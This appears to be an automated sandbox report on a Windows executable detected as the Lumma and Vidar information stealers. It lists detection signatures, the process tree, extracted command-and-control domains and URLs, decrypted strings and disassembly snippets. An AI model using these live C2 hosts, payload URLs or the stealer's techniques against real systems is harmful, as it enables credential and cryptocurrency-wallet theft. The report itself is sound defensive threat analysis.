Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524788
MD5: 7b5e8e3db2ce9c97f6a8214a4ccd3872
SHA1: e26cc5d9f9489593ae727a3358602d7b963f7f59
SHA256: 59776469143431b5ddf203e169ed86915ff04fff5ff8e7231a53472c043eabf4
Tags: exe, user-Bitsight
Infos:

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5888 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7B5E8E3DB2CE9C97F6A8214A4CCD3872)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • ECBKKKFHCF.exe (PID: 4460 cmdline: "C:\ProgramData\ECBKKKFHCF.exe" MD5: BE9E376D9BAB656B145A7C8316636903)
        • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 3300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 5388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 4776 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5012 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["soldiefieop.site", "chorusarorp.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site", "questionsmw.stor", "absorptioniw.site", "treatynreit.site"], "Build id": "H8NgCl--"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.4195570.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.4195570.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
3.2.RegAsm.exe.400000.2.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.RegAsm.exe.400000.2.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
3.2.RegAsm.exe.400000.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched

AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
Source: 10.2.RegAsm.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["soldiefieop.site", "chorusarorp.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site", "questionsmw.stor", "absorptioniw.site", "treatynreit.site"], "Build id": "H8NgCl--"}
Source: questionsmw.store | Virustotal: Detection: 10%
Source: gravvitywio.store | Virustotal: Detection: 8%
Source: cowod.hopto.org | Virustotal: Detection: 7%
Source: https://49.12.197.9/ | Virustotal: Detection: 10%
Source: https://soldiefieop.site/api | Virustotal: Detection: 13%
Source: https://abnomalrkmu.site/api | Virustotal: Detection: 12%
Source: http://cowod.hopto.org | Virustotal: Detection: 7%
Source: https://mysterisop.site/api | Virustotal: Detection: 13%
Source: https://49.12.197.9/sqlp.dll | Virustotal: Detection: 11%
Source: https://gravvitywio.store/apij | Virustotal: Detection: 6%
Source: https://49.12.197.9 | Virustotal: Detection: 10%
Source: https://mysterisop.site/pi | Virustotal: Detection: 7%
Source: C:\ProgramData\ECBKKKFHCF.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exe | ReversingLabs: Detection: 34%
Source: file.exe | Virustotal: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: absorptioniw.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: mysterisop.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: snarlypagowo.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: treatynreit.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: chorusarorp.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: abnomalrkmu.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: soldiefieop.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: questionsmw.stor
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: chorusarorp.site
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C616C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C616C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C76A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C76A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C764440 PK11_PrivDecrypt,3_2_6C764440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C734420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C734420
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source: Binary string: .pdb ? source: file.exe
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2827920795.000000003864F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2821875809.000000002C764000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source: Binary string: .pdb source: 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h10_2_00444040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+08h], ecx10_2_00401000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h10_2_0041B000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004210D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+50h], 00000000h10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h10_2_004480A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_004300B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_00429140
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000688h]10_2_0041D1D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h10_2_0041F1D6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_0044518B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+18h], 3602043Ah10_2_0042F1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]10_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]10_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+34h], edx10_2_004012F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax10_2_0042A280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00414294
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]10_2_00416319
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00433335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec ebx10_2_0043F3F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi]10_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]10_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004214D3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h10_2_0043F4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh10_2_0043F4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004214EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00416574
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
